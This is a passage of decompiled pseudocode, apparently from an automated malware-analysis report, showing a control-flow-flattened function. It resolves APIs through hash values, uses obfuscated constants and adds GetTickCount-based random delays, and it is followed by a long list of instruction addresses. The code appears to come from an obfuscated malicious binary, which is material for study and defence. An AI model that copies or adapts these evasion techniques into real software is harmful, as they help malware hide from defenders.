				signed int _t296;
				signed int _t299;
				void* _t301;
				void* _t302;
				intOrPtr* _t303;
				void* _t304;
				intOrPtr* _t307;
				signed int _t308;
				void* _t309;
				void* _t310;
				void* _t313;
				void* _t314;
				intOrPtr* _t315;
				void* _t316;
				intOrPtr* _t319;
				signed int _t320;
				void* _t321;
				signed int _t327;
				signed int _t335;
				intOrPtr _t344;
				intOrPtr _t360;
				signed int _t383;
				unsigned int _t388;
				unsigned int _t392;
				signed int _t413;
				signed int _t418;
				void* _t426;
				void* _t429;
				signed int _t433;
				signed int _t435;
				signed int _t438;
				void* _t442;
				unsigned int _t446;
				signed int _t451;
				void* _t453;
				void* _t454;
				void* _t456;
				void* _t457;
				void* _t458;
				void* _t459;

				_t453 = (_t451 & 0xfffffff8) - 0x80;
				_t327 = _v124;
				_t204 = 0x10e9bb52;
				_t446 = _v120;
				while(1) {
					L1:
					_t413 = _v116;
					while(1) {
						L2:
						_t426 = 0x3251fefe;
						do {
							while(1) {
								L3:
								_t456 = _t204 - 0x1bc488ca;
								if(_t456 > 0) {
									break;
								}
								if(_t456 == 0) {
									_t254 = E007A94D0();
									asm("sbb eax, eax");
									_t204 = ( ~_t254 & 0x12be9560) + 0x15f108c5;
									continue;
								} else {
									_t457 = _t204 - 0xc403738;
									if(_t457 > 0) {
										__eflags = _t204 - 0x15f108c5;
										if(__eflags > 0) {
											__eflags = _t204 - 0x1ba0f19f;
											if(__eflags > 0) {
												__eflags = _t204 - 0x1ba655e5;
												if(_t204 != 0x1ba655e5) {
													goto L44;
												} else {
													_v28 = E007A5FF0();
													_t204 = 0x1a1794c0;
													continue;
												}
											} else {
												if(__eflags == 0) {
													_t204 = 0x1cd4381f;
													continue;
												} else {
													__eflags = _t204 - 0x1a1794c0;
													if(_t204 == 0x1a1794c0) {
														E007A61E0( &_v24);
														_t204 = 0x34aece17;
														continue;
													} else {
														__eflags = _t204 - 0x1b363693;
														if(_t204 != 0x1b363693) {
															goto L44;
														} else {
															E007A4220(_t327, _v16);
															_t204 = 0x2ff16e51;
															continue;
														}
													}
												}
											}
										} else {
											if(__eflags == 0) {
												E007A9F30(_t327);
												_t261 =  *0x7ae28c; // 0x0
												_t413 = 0x1ba0f19f;
												_v116 = 0x1ba0f19f;
												__eflags = _t261;
												if(_t261 == 0) {
													_t263 = E007A3F00(0x9bab0b12);
													_t392 = 0xb90a6ccf;
													_t261 = E007A3E60(_t327, _t263, 0xb90a6ccf, _t446);
													 *0x7ae28c = _t261;
												}
												_t327 =  *_t261();
												_t446 = _t392;
												_t204 = 0xc403738;
												continue;
											} else {
												__eflags = _t204 - 0x10d6bdbf;
												if(__eflags > 0) {
													__eflags = _t204 - 0x10e9bb52;
													if(_t204 != 0x10e9bb52) {
														goto L44;
													} else {
														_t204 = 0x2e428786;
														continue;
													}
												} else {
													if(__eflags == 0) {
														E007A86E0();
														_t204 = 0xd118b9c;
														continue;
													} else {
														__eflags = _t204 - 0xd118b9c;
														if(_t204 == 0xd118b9c) {
															_t265 = E007AB430( &_v88, _t446);
															__eflags = _t265;
															if(_t265 != 0) {
																asm("xorps xmm0, xmm0");
																_t413 = 0x1a1794c0;
																asm("movlpd [esp+0x18], xmm0");
																_t446 = _v120;
																_t327 = _v124;
																_v116 = 0x1a1794c0;
															}
															goto L72;
														} else {
															__eflags = _t204 - 0xf3a9fea;
															if(_t204 != 0xf3a9fea) {
																goto L44;
															} else {
																_t266 = E007A6060( &_v76, _t392, _t446);
																__eflags = _t266;
																if(_t266 == 0) {
																	_t204 = 0x32f9862d;
																} else {
																	_t267 =  &_v76;
																	_t392 = 0x24b1f8c4;
																	_v48 = _t267;
																	_t268 = E007A4160(_t327, 0x9bab0b12, 0x24b1f8c4, _t446, 0x218);
																	_t453 = _t453 + 4;
																	_v48 =  *_t268(_t267);
																	_t204 = 0x39301ec9;
																}
																continue;
															}
														}
													}
												}
											}
										}
									} else {
										if(_t457 == 0) {
											__eflags = _t327 | _t446;
											if((_t327 | _t446) != 0) {
												_v124 = 0xcb73;
												_v124 = _v124 ^ 0x0a3afb83;
												_v124 = _v124 >> 0xe;
												_v124 = _v124 << 0xf;
												_v124 = _v124 * 0x63;
												_v124 = _v124 ^ 0xe8dc00a0;
												_t273 = E007A5D10();
												__eflags = _t273 - _v124;
												if(_t273 <= _v124) {
													_t388 = 0;
													__eflags = 0;
												} else {
													__eflags =  *0x7ade08;
													if( *0x7ade08 == 0) {
														 *0x7ade08 = E007A3E60(_t327, E007A3F00(0x9bab0b12), 0xd8ef4c49, _t446);
													}
													_v124 = 0xcb73;
													_v124 = _v124 ^ 0x0a3afb83;
													_v124 = _v124 >> 0xe;
													_v124 = _v124 << 0xf;
													_v124 = _v124 * 0x63;
													_v124 = _v124 ^ 0xe8dc00a0;
													_t283 = E007A5D10();
													_t388 = GetTickCount() % (_t283 - _v124);
												}
												_v124 = 0xcb73;
												_v124 = _v124 ^ 0x0a3afb83;
												_v124 = _v124 >> 0xe;
												_v124 = _v124 << 0xf;
												_v124 = _v124 * 0x63;
												_v124 = _v124 ^ 0xe8dc00a0;
												_t335 =  *0x7adb5c;
												_t429 = _v124 + _t388;
												__eflags = _t335;
												if(_t335 == 0) {
													_t280 = E007A3F00(0x9bab0b12);
													_t388 = 0x2194248e;
													_t335 = E007A3E60(_t327, _t280, 0x2194248e, _t446);
													 *0x7adb5c = _t335;
												}
												_t275 =  *0x7ae550; // 0x0
												_t276 =  *_t335( *((intOrPtr*)(_t275 + 0x14)), _t429);
												__eflags = _t276 - 0x102;
												if(_t276 == 0x102) {
													_t277 =  *0x7ae28c; // 0x0
													__eflags = _t277;
													if(_t277 == 0) {
														_t279 = E007A3F00(0x9bab0b12);
														_t388 = 0xb90a6ccf;
														_t277 = E007A3E60(_t327, _t279, 0xb90a6ccf, _t446);
														 *0x7ae28c = _t277;
													}
													_t278 =  *_t277();
													__eflags = _t388 - _t446;
													if(__eflags < 0) {
														L137:
														_t204 = 0xc403738;
														goto L1;
													} else {
														if(__eflags > 0) {
															L60:
															_t413 = _v124;
															_t426 = 0x3251fefe;
															_t204 = _t413;
															goto L44;
														} else {
															__eflags = _t278 - _t327;
															if(_t278 < _t327) {
																goto L137;
															} else {
																goto L60;
															}
														}
													}
												} else {
													_t204 = 0x32f9862d;
													while(1) {
														L1:
														_t413 = _v116;
														while(1) {
															L2:
															_t426 = 0x3251fefe;
															goto L3;
														}
													}
												}
											} else {
												_t204 = _t413;
												goto L44;
											}
										} else {
											_t458 = _t204 - 0x99d9f33;
											if(_t458 > 0) {
												__eflags = _t204 - 0xb7b0115;
												if(__eflags > 0) {
													__eflags = _t204 - 0xc039e9a;
													if(_t204 != 0xc039e9a) {
														goto L44;
													} else {
														E007A8700(_t327);
														_t204 = 0x28af9e25;
														continue;
													}
												} else {
													if(__eflags == 0) {
														E007A7120(_t327);
														_t204 = 0x3697b389;
														continue;
													} else {
														__eflags = _t204 - 0xb253d66;
														if(_t204 == 0xb253d66) {
															E007A4220(_t327, _v112);
															_t204 = 0x50dcbff;
															continue;
														} else {
															__eflags = _t204 - 0xb765cf9;
															if(_t204 != 0xb765cf9) {
																goto L44;
															} else {
																_t291 = E007A8400(_t327, _t446);
																_t344 =  *0x7ae54c; // 0x8df0b0
																__eflags = _t291;
																if(_t291 == 0) {
																	__eflags =  *(_t344 + 0x220);
																	_t204 =  !=  ? 0x2200eb3b : 0x2e7e0c52;
																} else {
																	__eflags =  *(_t344 + 0x220);
																	_t204 =  !=  ? 0x1bc488ca : 0x15f108c5;
																}
																continue;
															}
														}
													}
												}
											} else {
												if(_t458 == 0) {
													_v124 = 0xe61e;
													_v124 = _v124 >> 2;
													_v124 = _v124 ^ 0x01340267;
													_v32 = _v124;
													_t204 = 0x1ba655e5;
													continue;
												} else {
													_t459 = _t204 - 0x4d162d3;
													if(_t459 > 0) {
														__eflags = _t204 - 0x50dcbff;
														if(_t204 == 0x50dcbff) {
															E007A4220(_t327, _v96);
															_t204 = 0x1b363693;
															continue;
														} else {
															__eflags = _t204 - 0x62c3963;
															if(_t204 != 0x62c3963) {
																goto L44;
															} else {
																_t392 =  &_v88;
																_t296 = E007A7650( &_v112, _t392);
																__eflags = _t296;
																if(_t296 == 0) {
																	L72:
																	_t204 = 0xb253d66;
																} else {
																	E007AAFE0(0);
																	_t383 = _v80;
																	_t204 = 0x10d6bdbf;
																	__eflags = _t383;
																	if(_t383 != 0) {
																		__eflags = _t383 - 7;
																		_t204 =  ==  ? _t426 : 0x10d6bdbf;
																	}
																}
																continue;
															}
														}
													} else {
														if(_t459 == 0) {
															_v116 = 0x4b49;
															_v116 = _v116 << 0x10;
															_v116 = _v116 ^ 0x4b490001;
															_t299 = E007A12B0(_v116,  &_v96,  &_v112);
															_t454 = _t453 + 4;
															__eflags = _t299;
															if(_t299 == 0) {
																E007A1290();
																_t413 = 0x1a1794c0;
																_v116 = 0x1a1794c0;
																_t301 = E007A5DA0();
																_t302 = E007A5E00();
																__eflags = _t301 - _t302;
																if(_t301 <= _t302) {
																	_t433 = 0;
																	__eflags = 0;
																} else {
																	_t307 = E007A4160(_t327, 0x9bab0b12, 0xd8ef4c49, _t446, 0xca);
																	_t454 = _t454 + 4;
																	_t308 =  *_t307();
																	_t309 = E007A5DA0();
																	_t310 = E007A5E00();
																	_t413 = _v116;
																	_t433 = _t308 % (_t309 - _t310);
																}
																_t392 = 0xb90a6ccf;
																_t303 = E007A4160(_t327, 0x9bab0b12, 0xb90a6ccf, _t446, 0x1eb);
																_t453 = _t454 + 4;
																_t304 =  *_t303();
																_t446 = 0xb90a6ccf;
																_t327 = _t304 + E007A5E00() + _t433;
																_t204 = 0x50dcbff;
																asm("adc ebp, 0x0");
															} else {
																_t413 = 0x1a1794c0;
																_v116 = 0x1a1794c0;
																_t313 = E007A5E80();
																_t314 = E007A5E50();
																__eflags = _t314 - _t313;
																if(_t314 <= _t313) {
																	_t435 = 0;
																	__eflags = 0;
																} else {
																	_t319 = E007A4160(_t327, 0x9bab0b12, 0xd8ef4c49, _t446, 0xca);
																	_t454 = _t454 + 4;
																	_t320 =  *_t319();
																	_t321 = E007A5E80();
																	_t435 = _t320 % (E007A5E50() - _t321);
																}
																_t392 = 0xb90a6ccf;
																_t315 = E007A4160(_t327, 0x9bab0b12, 0xb90a6ccf, _t446, 0x1eb);
																_t453 = _t454 + 4;
																_t316 =  *_t315();
																_t446 = 0xb90a6ccf;
																_t327 = _t316 + E007A5E80() + _t435;
																_t204 = 0x62c3963;
																asm("adc ebp, 0x0");
															}
															while(1) {
																L2:
																_t426 = 0x3251fefe;
																goto L3;
															}
														} else {
															if(_t204 == 0x1b08adb) {
																_t204 = 0x3355994e;
																continue;
															} else {
																if(_t204 != 0x2609a3b) {
																	goto L44;
																} else {
																	E007A9620(_t446);
																	_t204 = 0x28a63df9;
																	continue;
																}
															}
														}
													}
												}
											}
										}
									}
								}
								L150:
							}
							__eflags = _t204 - 0x2ff16e51;
							if(__eflags > 0) {
								__eflags = _t204 - 0x3355994e;
								if(__eflags > 0) {
									__eflags = _t204 - 0x37e57243;
									if(__eflags > 0) {
										__eflags = _t204 - 0x39301ec9;
										if(_t204 != 0x39301ec9) {
											goto L44;
										} else {
											_t205 =  *0x7ae54c; // 0x8df0b0
											_t202 = _t205 + 0x46c; // 0x20abfa8f
											_v8 =  *_t202;
											_t204 = 0x22e7b396;
											goto L3;
										}
									} else {
										if(__eflags == 0) {
											_t392 =  &_v96;
											_t207 = E007A7410( &_v48, _t392);
											asm("sbb eax, eax");
											_t204 = ( ~_t207 & 0xe99b2c40) + 0x1b363693;
											goto L3;
										} else {
											__eflags = _t204 - 0x34aece17;
											if(_t204 == 0x34aece17) {
												E007AB1D0( &_v16);
												_t204 = 0x37e57243;
												goto L3;
											} else {
												__eflags = _t204 - 0x3697b389;
												if(_t204 != 0x3697b389) {
													goto L44;
												} else {
													_t211 = E007A9860();
													__eflags = _t211;
													if(_t211 == 0) {
														goto L128;
													} else {
														_t204 = 0x26a7c4f3;
														goto L3;
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										_v124 = 0x96c3;
										_v124 = _v124 + 0x17b8;
										_v116 = 0xf3a9fea;
										_v124 = 0x8d3dcb09 * _v124 >> 0x20 >> 4;
										_v124 = _v124 + 0xffff1bdc;
										_v124 = _v124 + 0x2513;
										_v124 = _v124 * 0x64;
										_v124 = _v124 + 0x37c0;
										_v124 = _v124 + 0xffff909a;
										_v124 = (_v124 << 6) - _v124;
										_v124 = _v124 ^ 0xee286cba;
										_v128 = 0x39e7;
										_v128 = _v128 | 0x1ba4dd87;
										_v128 = _v128 + 0x949;
										_v128 = 0x38e38e39 * _v128 >> 0x20 >> 4;
										_v128 = _v128 ^ 0x47e6e439;
										_v128 = _v128 ^ 0x2b9fcd36;
										_v128 = _v128 >> 7;
										_v128 = _v128 << 0xa;
										_v128 = _v128 + 0xded3;
										_v128 = _v128 ^ 0x60dbe593;
										__eflags = _v124 - _v128;
										if(_v124 <= _v128) {
											_t418 = 0;
											__eflags = 0;
										} else {
											__eflags =  *0x7ade08;
											if( *0x7ade08 == 0) {
												 *0x7ade08 = E007A3E60(_t327, E007A3F00(0x9bab0b12), 0xd8ef4c49, _t446);
											}
											_v124 = 0x39e7;
											_v124 = _v124 | 0x1ba4dd87;
											_v124 = _v124 + 0x949;
											_v124 = 0x38e38e39 * _v124 >> 0x20 >> 4;
											_v124 = _v124 ^ 0x47e6e439;
											_v124 = _v124 ^ 0x2b9fcd36;
											_v124 = _v124 >> 7;
											_v124 = _v124 << 0xa;
											_v124 = _v124 + 0xded3;
											_v124 = _v124 ^ 0x60dbe593;
											_t228 = E007A5EE0();
											_t418 = GetTickCount() % (_t228 - _v124);
										}
										_t438 =  *0x7ae28c; // 0x0
										__eflags = _t438;
										if(_t438 == 0) {
											_t438 = E007A3E60(_t327, E007A3F00(0x9bab0b12), 0xb90a6ccf, _t446);
											 *0x7ae28c = _t438;
										}
										_v124 = 0x39e7;
										_v124 = _v124 | 0x1ba4dd87;
										_v124 = _v124 + 0x949;
										_t392 = 0x38e38e39 * _v124 >> 0x20 >> 4;
										_v124 = _t392;
										_v124 = _v124 ^ 0x47e6e439;
										_v124 = _v124 ^ 0x2b9fcd36;
										_v124 = _v124 >> 7;
										_v124 = _v124 << 0xa;
										_v124 = _v124 + 0xded3;
										_v124 = _v124 ^ 0x60dbe593;
										_t221 =  *_t438();
										_t446 = _t392;
										_t327 = _t221 + _v124 + _t418;
										asm("adc ebp, 0x0");
										goto L137;
									} else {
										__eflags = _t204 - 0x3251fefe;
										if(__eflags > 0) {
											__eflags = _t204 - 0x32f9862d;
											if(_t204 != 0x32f9862d) {
												goto L44;
											} else {
												_t211 = E007AB2E0();
												goto L128;
											}
										} else {
											if(__eflags == 0) {
												return E007A8740(_t392, _t446);
											} else {
												__eflags = _t204 - 0x31c22ee5;
												if(_t204 == 0x31c22ee5) {
													E007A80A0(_t392);
													_t360 =  *0x7ae54c; // 0x8df0b0
													__eflags =  *(_t360 + 0x220);
													_t204 =  !=  ? 0x2b2ba899 : 0xc039e9a;
													goto L3;
												} else {
													__eflags = _t204 - 0x320a2fc0;
													if(_t204 != 0x320a2fc0) {
														goto L44;
													} else {
														_v36 = E007A4770(_t327, _t446);
														_t204 = 0x99d9f33;
														goto L3;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									_t237 =  *0x7ae494;
									__eflags = _t237;
									if(_t237 == 0) {
										_t242 = E007A3F00(0x9bab0b12);
										_t392 = 0x7facde30;
										_t237 = E007A3E60(_t327, _t242, 0x7facde30, _t446);
										 *0x7ae494 = _t237;
									}
									_t442 =  *_t237();
									_t239 =  *0x7adf30;
									__eflags = _t239;
									if(_t239 == 0) {
										_t241 = E007A3F00(0x9bab0b12);
										_t392 = 0x5010a54d;
										_t239 = E007A3E60(_t327, _t241, 0x5010a54d, _t446);
										 *0x7adf30 = _t239;
									}
									 *_t239(_t442, 0, _v24);
									_t204 = 0xc403738;
									goto L2;
								} else {
									__eflags = _t204 - 0x28a63df9;
									if(__eflags > 0) {
										__eflags = _t204 - 0x2e428786;
										if(__eflags > 0) {
											__eflags = _t204 - 0x2e7e0c52;
											if(_t204 != 0x2e7e0c52) {
												goto L44;
											} else {
												E007A9050();
												_t204 = 0x2609a3b;
												goto L3;
											}
										} else {
											if(__eflags == 0) {
												_t211 = E007A72D0(_t327);
												__eflags = _t211;
												if(_t211 == 0) {
													goto L128;
												} else {
													_t204 = 0xb7b0115;
													goto L3;
												}
											} else {
												__eflags = _t204 - 0x28af9e25;
												if(_t204 == 0x28af9e25) {
													return E007A8D40(_t446);
												} else {
													__eflags = _t204 - 0x2b2ba899;
													if(_t204 != 0x2b2ba899) {
														goto L44;
													} else {
														E007A8970();
														_t204 = 0xc039e9a;
														goto L3;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t211 = E007A8BB0();
											__eflags = _t211;
											if(_t211 == 0) {
												L128:
												return _t211;
											} else {
												_t204 = 0x31c22ee5;
												goto L3;
											}
										} else {
											__eflags = _t204 - 0x22e7b396;
											if(__eflags > 0) {
												__eflags = _t204 - 0x26a7c4f3;
												if(_t204 != 0x26a7c4f3) {
													goto L44;
												} else {
													_t246 = E007A9270();
													asm("sbb eax, eax");
													_t204 = ( ~_t246 & 0xf6ea3d42) + 0xb765cf9;
													goto L3;
												}
											} else {
												if(__eflags == 0) {
													_v40 = E007A53D0(_t327, _t446);
													_t204 = 0x320a2fc0;
													goto L3;
												} else {
													__eflags = _t204 - 0x1cd4381f;
													if(_t204 == 0x1cd4381f) {
														_t392 =  &_v100;
														_v104 = E007A3310(0x7ad320, _t392);
														E007A1840( &_v104);
														E007A3460(_t250);
														_t204 = 0x1b08adb;
														L2:
														_t426 = 0x3251fefe;
														goto L3;
													} else {
														__eflags = _t204 - 0x2200eb3b;
														if(_t204 != 0x2200eb3b) {
															goto L44;
														} else {
															E007A8E80();
															_t204 = 0x2e7e0c52;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L150;
							L44:
							__eflags = _t204 - 0x293c010e;
						} while (_t204 != 0x293c010e);
						return _t204;
						goto L150;
					}
				}
			}


























































































                                                                                0x007a65e6
                                                                                0x007a65ed
                                                                                0x007a65f1
                                                                                0x007a65f7
                                                                                0x007a65fd
                                                                                0x007a65fd
                                                                                0x007a65fd
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x007a6610
                                                                                0x007a6610
                                                                                0x007a6610
                                                                                0x007a6610
                                                                                0x007a6615
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a661b
                                                                                0x007a6bc2
                                                                                0x007a6bc9
                                                                                0x007a6bd0
                                                                                0x00000000
                                                                                0x007a6621
                                                                                0x007a6621
                                                                                0x007a6626
                                                                                0x007a6a44
                                                                                0x007a6a49
                                                                                0x007a6b56
                                                                                0x007a6b5b
                                                                                0x007a6ba4
                                                                                0x007a6ba9
                                                                                0x00000000
                                                                                0x007a6baf
                                                                                0x007a6bb4
                                                                                0x007a6bb8
                                                                                0x00000000
                                                                                0x007a6bb8
                                                                                0x007a6b5d
                                                                                0x007a6b5d
                                                                                0x007a6b9a
                                                                                0x00000000
                                                                                0x007a6b5f
                                                                                0x007a6b5f
                                                                                0x007a6b64
                                                                                0x007a6b8b
                                                                                0x007a6b90
                                                                                0x00000000
                                                                                0x007a6b66
                                                                                0x007a6b66
                                                                                0x007a6b6b
                                                                                0x00000000
                                                                                0x007a6b71
                                                                                0x007a6b78
                                                                                0x007a6b7d
                                                                                0x00000000
                                                                                0x007a6b7d
                                                                                0x007a6b6b
                                                                                0x007a6b64
                                                                                0x007a6b5d
                                                                                0x007a6a4f
                                                                                0x007a6a4f
                                                                                0x007a6b14
                                                                                0x007a6b19
                                                                                0x007a6b1e
                                                                                0x007a6b23
                                                                                0x007a6b27
                                                                                0x007a6b29
                                                                                0x007a6b30
                                                                                0x007a6b35
                                                                                0x007a6b3c
                                                                                0x007a6b41
                                                                                0x007a6b41
                                                                                0x007a6b48
                                                                                0x007a6b4a
                                                                                0x007a6b4c
                                                                                0x00000000
                                                                                0x007a6a55
                                                                                0x007a6a55
                                                                                0x007a6a5a
                                                                                0x007a6aff
                                                                                0x007a6b04
                                                                                0x00000000
                                                                                0x007a6b0a
                                                                                0x007a6b0a
                                                                                0x00000000
                                                                                0x007a6b0a
                                                                                0x007a6a60
                                                                                0x007a6a60
                                                                                0x007a6af0
                                                                                0x007a6af5
                                                                                0x00000000
                                                                                0x007a6a66
                                                                                0x007a6a66
                                                                                0x007a6a6b
                                                                                0x007a6ac3
                                                                                0x007a6ac8
                                                                                0x007a6aca
                                                                                0x007a6acc
                                                                                0x007a6acf
                                                                                0x007a6ad4
                                                                                0x007a6ada
                                                                                0x007a6ade
                                                                                0x007a6ae2
                                                                                0x007a6ae2
                                                                                0x00000000
                                                                                0x007a6a6d
                                                                                0x007a6a6d
                                                                                0x007a6a72
                                                                                0x00000000
                                                                                0x007a6a78
                                                                                0x007a6a7c
                                                                                0x007a6a81
                                                                                0x007a6a83
                                                                                0x007a6ab5
                                                                                0x007a6a85
                                                                                0x007a6a85
                                                                                0x007a6a89
                                                                                0x007a6a99
                                                                                0x007a6a9d
                                                                                0x007a6aa2
                                                                                0x007a6aa7
                                                                                0x007a6aab
                                                                                0x007a6aab
                                                                                0x00000000
                                                                                0x007a6a83
                                                                                0x007a6a72
                                                                                0x007a6a6b
                                                                                0x007a6a60
                                                                                0x007a6a5a
                                                                                0x007a6a4f
                                                                                0x007a662c
                                                                                0x007a662c
                                                                                0x007a68ce
                                                                                0x007a68d0
                                                                                0x007a68e7
                                                                                0x007a68ef
                                                                                0x007a68f7
                                                                                0x007a68fc
                                                                                0x007a6906
                                                                                0x007a690a
                                                                                0x007a6912
                                                                                0x007a6917
                                                                                0x007a691b
                                                                                0x007a6985
                                                                                0x007a6985
                                                                                0x007a691d
                                                                                0x007a6923
                                                                                0x007a6925
                                                                                0x007a693f
                                                                                0x007a693f
                                                                                0x007a6945
                                                                                0x007a694d
                                                                                0x007a6955
                                                                                0x007a695a
                                                                                0x007a6964
                                                                                0x007a6968
                                                                                0x007a6970
                                                                                0x007a6981
                                                                                0x007a6981
                                                                                0x007a6987
                                                                                0x007a698f
                                                                                0x007a6997
                                                                                0x007a699c
                                                                                0x007a69a6
                                                                                0x007a69aa
                                                                                0x007a69b6
                                                                                0x007a69bc
                                                                                0x007a69be
                                                                                0x007a69c0
                                                                                0x007a69c7
                                                                                0x007a69cc
                                                                                0x007a69d8
                                                                                0x007a69da
                                                                                0x007a69da
                                                                                0x007a69e0
                                                                                0x007a69e9
                                                                                0x007a69eb
                                                                                0x007a69f0
                                                                                0x007a69fc
                                                                                0x007a6a01
                                                                                0x007a6a03
                                                                                0x007a6a0a
                                                                                0x007a6a0f
                                                                                0x007a6a16
                                                                                0x007a6a1b
                                                                                0x007a6a1b
                                                                                0x007a6a20
                                                                                0x007a6a22
                                                                                0x007a6a24
                                                                                0x007a6fc8
                                                                                0x007a6fc8
                                                                                0x00000000
                                                                                0x007a6a2a
                                                                                0x007a6a2a
                                                                                0x007a6a34
                                                                                0x007a6a34
                                                                                0x007a6a38
                                                                                0x007a6a3d
                                                                                0x00000000
                                                                                0x007a6a2c
                                                                                0x007a6a2c
                                                                                0x007a6a2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a6a2e
                                                                                0x007a6a2a
                                                                                0x007a69f2
                                                                                0x007a69f2
                                                                                0x007a65fd
                                                                                0x007a65fd
                                                                                0x007a65fd
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x00000000
                                                                                0x007a6606
                                                                                0x007a6601
                                                                                0x007a65fd
                                                                                0x007a68d2
                                                                                0x007a68d2
                                                                                0x00000000
                                                                                0x007a68d2
                                                                                0x007a6632
                                                                                0x007a6632
                                                                                0x007a6637
                                                                                0x007a6838
                                                                                0x007a683d
                                                                                0x007a68b6
                                                                                0x007a68bb
                                                                                0x00000000
                                                                                0x007a68bd
                                                                                0x007a68bd
                                                                                0x007a68c2
                                                                                0x00000000
                                                                                0x007a68c2
                                                                                0x007a683f
                                                                                0x007a683f
                                                                                0x007a68a7
                                                                                0x007a68ac
                                                                                0x00000000
                                                                                0x007a6841
                                                                                0x007a6841
                                                                                0x007a6846
                                                                                0x007a6898
                                                                                0x007a689d
                                                                                0x00000000
                                                                                0x007a6848
                                                                                0x007a6848
                                                                                0x007a684d
                                                                                0x00000000
                                                                                0x007a6853
                                                                                0x007a6853
                                                                                0x007a6858
                                                                                0x007a685e
                                                                                0x007a6860
                                                                                0x007a687b
                                                                                0x007a688c
                                                                                0x007a6862
                                                                                0x007a6862
                                                                                0x007a6873
                                                                                0x007a6873
                                                                                0x00000000
                                                                                0x007a6860
                                                                                0x007a684d
                                                                                0x007a6846
                                                                                0x007a683f
                                                                                0x007a663d
                                                                                0x007a663d
                                                                                0x007a6811
                                                                                0x007a6819
                                                                                0x007a681e
                                                                                0x007a682a
                                                                                0x007a682e
                                                                                0x00000000
                                                                                0x007a6643
                                                                                0x007a6643
                                                                                0x007a6648
                                                                                0x007a67b4
                                                                                0x007a67b9
                                                                                0x007a6802
                                                                                0x007a6807
                                                                                0x00000000
                                                                                0x007a67bb
                                                                                0x007a67bb
                                                                                0x007a67c0
                                                                                0x00000000
                                                                                0x007a67c6
                                                                                0x007a67c6
                                                                                0x007a67ce
                                                                                0x007a67d3
                                                                                0x007a67d5
                                                                                0x007a6ae6
                                                                                0x007a6ae6
                                                                                0x007a67db
                                                                                0x007a67dd
                                                                                0x007a67e2
                                                                                0x007a67e6
                                                                                0x007a67eb
                                                                                0x007a67ed
                                                                                0x007a67f3
                                                                                0x007a67f6
                                                                                0x007a67f6
                                                                                0x007a67ed
                                                                                0x00000000
                                                                                0x007a67d5
                                                                                0x007a67c0
                                                                                0x007a664e
                                                                                0x007a664e
                                                                                0x007a6675
                                                                                0x007a6681
                                                                                0x007a668a
                                                                                0x007a6697
                                                                                0x007a669c
                                                                                0x007a669f
                                                                                0x007a66a1
                                                                                0x007a672a
                                                                                0x007a672f
                                                                                0x007a6734
                                                                                0x007a6738
                                                                                0x007a673f
                                                                                0x007a6744
                                                                                0x007a6746
                                                                                0x007a677f
                                                                                0x007a677f
                                                                                0x007a6748
                                                                                0x007a6757
                                                                                0x007a675c
                                                                                0x007a675f
                                                                                0x007a6763
                                                                                0x007a676a
                                                                                0x007a6777
                                                                                0x007a677b
                                                                                0x007a677b
                                                                                0x007a6786
                                                                                0x007a6790
                                                                                0x007a6795
                                                                                0x007a6798
                                                                                0x007a679c
                                                                                0x007a67a5
                                                                                0x007a67a7
                                                                                0x007a67ac
                                                                                0x007a66a7
                                                                                0x007a66a7
                                                                                0x007a66ac
                                                                                0x007a66b0
                                                                                0x007a66b7
                                                                                0x007a66bc
                                                                                0x007a66be
                                                                                0x007a66f5
                                                                                0x007a66f5
                                                                                0x007a66c0
                                                                                0x007a66cf
                                                                                0x007a66d4
                                                                                0x007a66d7
                                                                                0x007a66db
                                                                                0x007a66f1
                                                                                0x007a66f1
                                                                                0x007a66fc
                                                                                0x007a6706
                                                                                0x007a670b
                                                                                0x007a670e
                                                                                0x007a6712
                                                                                0x007a671b
                                                                                0x007a671d
                                                                                0x007a6722
                                                                                0x007a6722
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x007a6601
                                                                                0x00000000
                                                                                0x007a6601
                                                                                0x007a6650
                                                                                0x007a6655
                                                                                0x007a666e
                                                                                0x00000000
                                                                                0x007a6657
                                                                                0x007a665c
                                                                                0x00000000
                                                                                0x007a6662
                                                                                0x007a6662
                                                                                0x007a6667
                                                                                0x00000000
                                                                                0x007a6667
                                                                                0x007a665c
                                                                                0x007a6655
                                                                                0x007a664e
                                                                                0x007a6648
                                                                                0x007a663d
                                                                                0x007a6637
                                                                                0x007a662c
                                                                                0x007a6626
                                                                                0x00000000
                                                                                0x007a661b
                                                                                0x007a6bda
                                                                                0x007a6bdf
                                                                                0x007a6d5f
                                                                                0x007a6d64
                                                                                0x007a6fd2
                                                                                0x007a6fd7
                                                                                0x007a703a
                                                                                0x007a703f
                                                                                0x00000000
                                                                                0x007a7045
                                                                                0x007a7045
                                                                                0x007a704a
                                                                                0x007a7050
                                                                                0x007a7057
                                                                                0x00000000
                                                                                0x007a7057
                                                                                0x007a6fd9
                                                                                0x007a6fd9
                                                                                0x007a701a
                                                                                0x007a7022
                                                                                0x007a7029
                                                                                0x007a7030
                                                                                0x00000000
                                                                                0x007a6fdb
                                                                                0x007a6fdb
                                                                                0x007a6fe0
                                                                                0x007a700b
                                                                                0x007a7010
                                                                                0x00000000
                                                                                0x007a6fe2
                                                                                0x007a6fe2
                                                                                0x007a6fe7
                                                                                0x00000000
                                                                                0x007a6fed
                                                                                0x007a6fed
                                                                                0x007a6ff2
                                                                                0x007a6ff4
                                                                                0x00000000
                                                                                0x007a6ffa
                                                                                0x007a6ffa
                                                                                0x00000000
                                                                                0x007a6ffa
                                                                                0x007a6ff4
                                                                                0x007a6fe7
                                                                                0x007a6fe0
                                                                                0x007a6fd9
                                                                                0x007a6d6a
                                                                                0x007a6d6a
                                                                                0x007a6dda
                                                                                0x007a6de7
                                                                                0x007a6df5
                                                                                0x007a6e00
                                                                                0x007a6e04
                                                                                0x007a6e0c
                                                                                0x007a6e19
                                                                                0x007a6e1d
                                                                                0x007a6e25
                                                                                0x007a6e3d
                                                                                0x007a6e41
                                                                                0x007a6e49
                                                                                0x007a6e51
                                                                                0x007a6e59
                                                                                0x007a6e6a
                                                                                0x007a6e6e
                                                                                0x007a6e76
